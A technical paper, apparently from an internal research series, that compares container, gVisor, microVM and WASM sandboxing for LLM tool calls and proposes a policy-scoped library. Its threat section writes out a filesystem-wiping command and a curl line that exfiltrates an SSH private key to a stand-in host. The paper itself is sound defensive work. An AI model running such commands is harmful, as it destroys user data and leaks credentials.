
**Author:** Roman "Romanov" Research-Rachmaninov, #B4mad Industries
**Date:** 2026-02-19
**Bead:** beads-hub-42d

## Abstract

Tool use is emerging as the critical capability gap between proprietary and open-source language models. Sebastian Raschka (Lex Fridman #490) identifies it as "the huge unlock" but flags trust as the barrier: unconstrained tool execution on a user's machine risks data destruction, exfiltration, and privilege escalation. This paper evaluates four sandboxing technologies — OCI containers, gVisor, Firecracker microVMs, and WebAssembly (WASM) — for isolating LLM-initiated tool calls. We propose a **security-scoped tool execution layer** that #B4mad can extract from OpenClaw as a standalone library, enabling any local open model to safely invoke tools.

## Context: Why This Matters for #B4mad

OpenClaw already implements sandboxed execution: sub-agents run shell commands, edit files, and control browsers within a managed environment with policy-based access control. This capability is baked into the platform but not extractable. Meanwhile, the open-model ecosystem (Qwen, Llama, Mistral) is rapidly gaining function-calling abilities but lacks a standardized, secure execution runtime. There is a clear product opportunity: a lightweight, embeddable sandbox library that any inference framework (llama.cpp, vLLM, Ollama) can use to safely execute tool calls.

## The Trust Problem

When an LLM generates a tool call like `exec("rm -rf /")` or `curl https://evil.com/exfil --data @~/.ssh/id_rsa`, the runtime must enforce:

1. **Filesystem isolation** — restrict reads/writes to a scoped directory
2. **Network policy** — block or allowlist outbound connections
3. **Syscall filtering** — prevent privilege escalation, raw device access
4. **Resource limits** — CPU, memory, time caps to prevent DoS
5. **Capability scoping** — per-tool permission grants (this tool may read files but not write; that tool may make HTTP requests but only to api.example.com)
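These requirements reduce to deny-by-default capability checks. A minimal sketch of what per-tool scoping could look like — `ToolGrant` and both helper functions are illustrative names, not an existing API:

```python
from dataclasses import dataclass
from pathlib import PurePosixPath

@dataclass
class ToolGrant:
    """Per-tool permission grant; anything not listed is denied."""
    readable: tuple = ()   # path prefixes the tool may read
    writable: tuple = ()   # path prefixes the tool may write
    hosts: tuple = ()      # (host, port) pairs allowed outbound
    timeout_s: int = 30
    memory_mb: int = 128

def path_allowed(grant: ToolGrant, path: str, write: bool = False) -> bool:
    # Writable paths are implicitly readable; everything else is denied.
    prefixes = grant.writable if write else grant.readable + grant.writable
    p = PurePosixPath(path)
    return any(p == PurePosixPath(pre) or PurePosixPath(pre) in p.parents
               for pre in prefixes)

def host_allowed(grant: ToolGrant, host: str, port: int) -> bool:
    return (host, port) in grant.hosts

# A fetch tool scoped to one endpoint can touch no files at all:
web_fetch = ToolGrant(hosts=(("api.example.com", 443),))
print(path_allowed(web_fetch, "/home/user/.ssh/id_rsa"))  # False: deny by default
print(host_allowed(web_fetch, "api.example.com", 443))    # True
```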

## Technology Evaluation

### 1. OCI Containers (Docker, Podman)

**How it works:** Tool calls execute inside a container with a minimal filesystem, dropped capabilities, seccomp profiles, and network namespaces.

| Aspect | Assessment |
|--------|------------|
| Startup latency | 200–500ms (cold), <100ms (warm with pool) |
| Isolation strength | Good — namespace + cgroup + seccomp. Not a security boundary by default, but hardened configs (rootless, no-new-privileges, read-only rootfs) are strong |
| Ecosystem maturity | Excellent — universal tooling, broad adoption |
| Filesystem scoping | Bind-mount specific directories read-only or read-write |
| Network control | `--network=none` or custom network policies |
| Overhead | Low — shared kernel, minimal memory overhead |

**Verdict:** Best default choice. Lowest friction, most mature, sufficient isolation for the threat model (untrusted LLM output, not adversarial kernel exploits).
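As a sketch, the hardening knobs mentioned above (no network, dropped capabilities, no-new-privileges, read-only rootfs, resource caps) map directly onto `podman run` flags. The image name, mount path, and command here are placeholders:

```python
def hardened_run_args(workdir: str, memory_mb: int = 128,
                      image: str = "docker.io/library/alpine",
                      command: tuple = ("sh", "-c", "echo ok")) -> list:
    """Build a locked-down podman invocation for a single tool call."""
    return [
        "podman", "run", "--rm",
        "--network=none",                       # no outbound network at all
        "--cap-drop=ALL",                       # drop every Linux capability
        "--security-opt", "no-new-privileges",  # block setuid/setgid escalation
        "--read-only",                          # immutable root filesystem
        f"--memory={memory_mb}m",               # hard memory cap
        "--pids-limit=64",                      # contain fork bombs
        "-v", f"{workdir}:/workspace:rw",       # the only writable mount
        image, *command,
    ]

print(" ".join(hardened_run_args("/tmp/job-1")))
```

Run rootless, this keeps the container's root user unprivileged on the host even before the flags above apply.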

### 2. gVisor (runsc)

**How it works:** A user-space kernel that intercepts syscalls, providing an additional isolation layer on top of OCI containers. Used by Google Cloud Run.

| Aspect | Assessment |
|--------|------------|
| Startup latency | 300–800ms |
| Isolation strength | Excellent — syscall interception means container escapes require defeating both gVisor and the host kernel |
| Ecosystem maturity | Good — drop-in OCI runtime replacement |
| Compatibility | ~90% of Linux syscalls; some edge cases (io_uring, certain ioctls) fail |
| Performance | 5–30% overhead on I/O-heavy workloads due to syscall interposition |

**Verdict:** Strong choice when higher isolation is needed (e.g., executing code generated by untrusted models). The OCI compatibility means it's a runtime swap, not an architecture change.
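The runtime swap is a one-time registration. Following gVisor's documented Docker setup, adding `runsc` to the daemon configuration makes hardened isolation a per-container flag; the binary path below assumes a standard install:

```python
import json

# Content for /etc/docker/daemon.json registering runsc as an extra OCI runtime.
daemon_json = {
    "runtimes": {
        "runsc": {"path": "/usr/local/bin/runsc"}
    }
}
print(json.dumps(daemon_json, indent=2))

# After restarting dockerd, opt in per container:
#   docker run --runtime=runsc ...
# Everything else (image, mounts, seccomp, network flags) stays unchanged.
```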

### 3. Firecracker microVMs

**How it works:** Lightweight VMs with a minimal VMM (Virtual Machine Monitor), booting a stripped Linux kernel in ~125ms. Used by AWS Lambda and Fly.io.

| Aspect | Assessment |
|--------|------------|
| Startup latency | 125–200ms (impressive for a full VM) |
| Isolation strength | Maximum — hardware virtualization boundary (KVM). Separate kernel instance |
| Resource overhead | ~5MB memory for the VMM; guest kernel adds ~20–40MB |
| Ecosystem maturity | Moderate — requires KVM, custom rootfs images, API-driven lifecycle |
| Complexity | High — snapshot/restore helps latency but adds operational complexity |

**Verdict:** Overkill for most tool calls but appropriate for high-risk operations (arbitrary code execution, untrusted plugins). The snapshot/restore pattern could pre-warm VMs for sub-100ms cold starts.
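To make the API-driven lifecycle concrete, these are the shapes of the JSON payloads a toolcage backend would `PUT` to Firecracker's `/machine-config` and `/boot-source` endpoints over its Unix socket before triggering `InstanceStart`. The kernel path is a placeholder; field names follow Firecracker's REST API:

```python
import json

def machine_config(vcpus: int = 1, mem_mib: int = 128) -> dict:
    # PUT /machine-config: size the microVM before boot
    return {"vcpu_count": vcpus, "mem_size_mib": mem_mib}

def boot_source(kernel: str = "/var/lib/toolcage/vmlinux") -> dict:
    # PUT /boot-source: uncompressed kernel plus minimal serial-console boot args
    return {
        "kernel_image_path": kernel,
        "boot_args": "console=ttyS0 reboot=k panic=1 pci=off",
    }

print(json.dumps(machine_config()))
print(json.dumps(boot_source()))
```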

### 4. WebAssembly (WASM) Sandboxes

**How it works:** Tool implementations compiled to WASM run in a sandboxed runtime (Wasmtime, WasmEdge) with capability-based security (WASI).

| Aspect | Assessment |
|--------|------------|
| Startup latency | <1ms (near-instant) |
| Isolation strength | Very good — linear memory model, no raw syscalls, capability-based I/O |
| Ecosystem maturity | Growing but incomplete — WASI preview 2 still stabilizing; not all tools can be compiled to WASM |
| Language support | Rust, C/C++, Go (via TinyGo), Python (via componentize-py, limited) |
| Limitation | Cannot run arbitrary shell commands; tools must be purpose-built as WASM components |

**Verdict:** Ideal for a curated tool catalog (file operations, HTTP clients, parsers) but cannot sandbox arbitrary shell execution. Complementary to container-based approaches.
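The capability model shows up at launch time: with Wasmtime's CLI, the only directories a module can see are those explicitly preopened with `--dir`. A sketch, with the module and workspace paths as placeholders:

```python
def wasmtime_args(module: str, workspace: str) -> list:
    """Invoke a WASM tool with a single preopened directory.

    From the module's point of view, paths outside the --dir grant
    do not exist at all (WASI capability-based I/O), so there is no
    allowlist to misconfigure for the rest of the filesystem.
    """
    return [
        "wasmtime", "run",
        f"--dir={workspace}",  # preopen: the module's entire visible filesystem
        module,
    ]

print(" ".join(wasmtime_args("file_edit.wasm", "/workspace/project")))
```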

## Proposed Architecture: `toolcage`

We propose a library called **`toolcage`** (working name) with the following design:

```
┌─────────────────────────────────────┐
│         Inference Runtime           │
│  (Ollama / vLLM / llama.cpp)        │
│                                     │
│  Model generates: tool_call(...)    │
│         │                           │
│         ▼                           │
│  ┌─────────────┐                    │
│  │  toolcage   │  ← policy engine   │
│  │  library    │  ← sandbox manager │
│  └──────┬──────┘                    │
│         │                           │
└─────────┼───────────────────────────┘
          │
          ▼
┌─────────────────────┐
│   Sandbox Backend   │

│  ┌───┐ ┌───┐ ┌───┐  │
│  │OCI│ │gVi│ │WAS│  │
│  │   │ │sor│ │M  │  │
│  └───┘ └───┘ └───┘  │
└─────────────────────┘
```

### Core Concepts

1. **Tool Registry** — each tool declares its capabilities: filesystem paths, network endpoints, max execution time, required syscalls
2. **Policy Engine** — a TOML/YAML policy file maps tools to allowed capabilities, similar to OpenClaw's existing tool policies
3. **Sandbox Backend** — pluggable: OCI (default), gVisor (hardened), Firecracker (maximum), WASM (for built-in tools)
4. **Result Extraction** — structured output capture (stdout/stderr/exit code/files) with size limits
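A hypothetical slice of the library API tying the registry and policy concepts together — every name here is illustrative, since toolcage does not exist yet:

```python
from dataclasses import dataclass

@dataclass
class ToolSpec:
    """Registry entry: a tool declares its capabilities up front."""
    name: str
    backend: str = "oci"
    network: str = "none"
    writable: tuple = ()
    timeout_s: int = 30

class Registry:
    def __init__(self):
        self._tools = {}

    def register(self, spec: ToolSpec) -> None:
        self._tools[spec.name] = spec

    def resolve(self, name: str) -> ToolSpec:
        # Deny-by-default: a tool call the model invents never reaches a sandbox.
        if name not in self._tools:
            raise PermissionError(f"tool {name!r} not registered")
        return self._tools[name]

reg = Registry()
reg.register(ToolSpec("web_fetch", network="allowlist:api.example.com:443"))
print(reg.resolve("web_fetch").backend)  # oci
```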

### Example Policy

```toml
[tool.web_fetch]
backend = "oci"
network = ["allowlist:api.example.com:443"]
filesystem = "none"
timeout = "30s"
memory = "128MB"

[tool.code_execute]
backend = "gvisor"
network = "none"
filesystem = { writable = ["/workspace"], readable = ["/data"] }
timeout = "60s"
memory = "512MB"

[tool.file_edit]
backend = "wasm"
filesystem = { writable = ["/workspace/project"] }
network = "none"
timeout = "10s"
```

### Integration Points

- **Ollama:** Post-generation hook that intercepts tool calls before execution
- **vLLM:** Custom tool executor callback in the serving layer
- **llama.cpp:** Function call handler in server mode
- **OpenClaw:** Replace the current exec subsystem with toolcage for consistency
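Whatever the runtime, the integration pattern is the same: intercept the model's emitted tool calls, resolve each against a policy, execute inside the sandbox, and feed the result back as a tool message. A runtime-agnostic sketch, where `sandbox_exec` stands in for the (hypothetical) toolcage entry point:

```python
import json

def handle_tool_calls(tool_calls: list, policies: dict, sandbox_exec) -> list:
    """Run each model-emitted tool call under its policy; unknown tools are refused."""
    results = []
    for call in tool_calls:
        name, args = call["name"], call.get("arguments", {})
        if name not in policies:
            # Deny-by-default: the model asked for a tool with no policy.
            results.append({"tool": name, "error": "no policy; refusing to execute"})
            continue
        out = sandbox_exec(name, args, policies[name])  # runs in the sandbox backend
        results.append({"tool": name, "output": out})
    return results

# Stand-in executor for illustration only:
fake_exec = lambda name, args, policy: f"ran {name} under {policy['backend']}"
results = handle_tool_calls(
    [{"name": "web_fetch", "arguments": {"url": "https://api.example.com"}},
     {"name": "rm_rf", "arguments": {}}],
    {"web_fetch": {"backend": "oci"}},
    fake_exec,
)
print(json.dumps(results, indent=2))
```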

## Competitive Landscape

| Project | Approach | Gap |
|---------|----------|-----|
| OpenAI Code Interpreter | Proprietary sandbox | Not available locally |
| E2B.dev | Cloud-hosted sandboxes | Requires network round-trip; not local-first |
| Modal | Serverless containers | Cloud-only; not embeddable |
| Daytona | Dev environment sandboxes | Full workspace, not per-tool-call scoped |
| **toolcage** (proposed) | **Local, per-call, policy-scoped** | **Does not exist yet** |

The key differentiator: **toolcage** would be the first local-first, embeddable, per-tool-call sandbox with declarative security policies.

## Recommendations

1. **Start with OCI + rootless Podman** as the default backend. It's available everywhere, well-understood, and sufficient for the primary threat model.

2. **Implement the policy engine first** — this is the real value. The sandbox backend is pluggable; the security model is the product.

3. **Ship as a Go or Rust library with a CLI wrapper** — embeddable in inference runtimes but also usable standalone (`toolcage exec --policy tools.toml -- python script.py`).

4. **Contribute to the MCP (Model Context Protocol) ecosystem** — Anthropic's MCP is becoming the standard for tool definitions. A toolcage MCP server that wraps any tool in a sandbox would have immediate adoption.

5. **Extract from OpenClaw incrementally** — OpenClaw's exec subsystem already solves this problem. Factor out the sandbox and policy layers as a library, then have OpenClaw depend on it.

6. **Publish as open source** — this positions #B4mad as a thought leader in secure local AI infrastructure, driving adoption toward the broader OpenClaw platform.

## Risk Assessment

| Risk | Likelihood | Mitigation |
|------|-----------|------------|
| Container escape via kernel exploit | Low | gVisor/Firecracker backends for high-risk tools |
| Policy misconfiguration allows exfiltration | Medium | Deny-by-default; require explicit allowlists; lint policies |
| Performance overhead kills UX | Medium | Container pooling; WASM for lightweight tools; warm caches |
| Ecosystem moves to cloud-only sandboxes | Low | Local-first is a strong counter-position for privacy-conscious users |
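The misconfiguration row above argues for shipping a policy linter alongside the library. A minimal sketch that flags overly broad grants; the rule set is illustrative:

```python
def lint_policy(tools: dict) -> list:
    """Return human-readable warnings for risky per-tool grants."""
    warnings = []
    for name, cfg in tools.items():
        if cfg.get("network", "none") in ("*", "all", "any"):
            warnings.append(f"{name}: unrestricted network access")
        fs = cfg.get("filesystem", "none")
        if isinstance(fs, dict) and "/" in fs.get("writable", []):
            warnings.append(f"{name}: whole filesystem writable")
        if "timeout" not in cfg:
            warnings.append(f"{name}: no timeout (DoS risk)")
    return warnings

# A deliberately bad policy trips all three rules:
print(lint_policy({"scratch": {"network": "*",
                               "filesystem": {"writable": ["/"]}}}))
```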

## References

1. Raschka, S. (2026). Interview on Lex Fridman Podcast #490, "AI State of the Art 2026." ~32:54 timestamp discussing tool use and containerization.
2. Google gVisor Project. https://gvisor.dev/
3. AWS Firecracker. https://firecracker-microvm.github.io/
4. WebAssembly System Interface (WASI). https://wasi.dev/
5. Anthropic Model Context Protocol (MCP). https://modelcontextprotocol.io/
6. E2B.dev — Open-source cloud sandboxes for AI. https://e2b.dev/
7. Open Containers Initiative (OCI) Runtime Specification. https://opencontainers.org/

---

*This paper was produced by Romanov (Research-Rachmaninov) for #B4mad Industries. Filed under bead beads-hub-42d.*

